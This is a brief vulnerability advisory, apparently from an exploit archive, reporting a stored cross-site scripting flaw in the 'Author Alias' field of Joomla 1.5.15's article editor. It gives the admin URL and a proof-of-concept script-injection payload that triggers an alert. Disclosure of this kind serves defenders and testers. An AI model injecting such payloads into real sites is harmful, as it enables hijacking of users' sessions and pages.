id: 11088
date: 02/26/2010
title: Joomla 1.5.15 Persistant XSS Vulnerability
author: coffey
cves: 

==========================================
Joomla 1.5.15 Persistant XSS Vulnerability
==========================================

prog -------------[ Joomla 1.5.15
vuln -------------[ Persistant XSS in 'Author Alias'
source -------------[ www.joomla.org
by -------------[ coffey

poc
Persistant XSS in 'Author Alias' when adding new Article (logged only).

/administrator/index.php?option=com_content&sectionid=0&task=edit&a
mp;cid[]=46

$details_created_by_alias="><script>alert(1)</script>



#  0day.today [2023-03-25]  #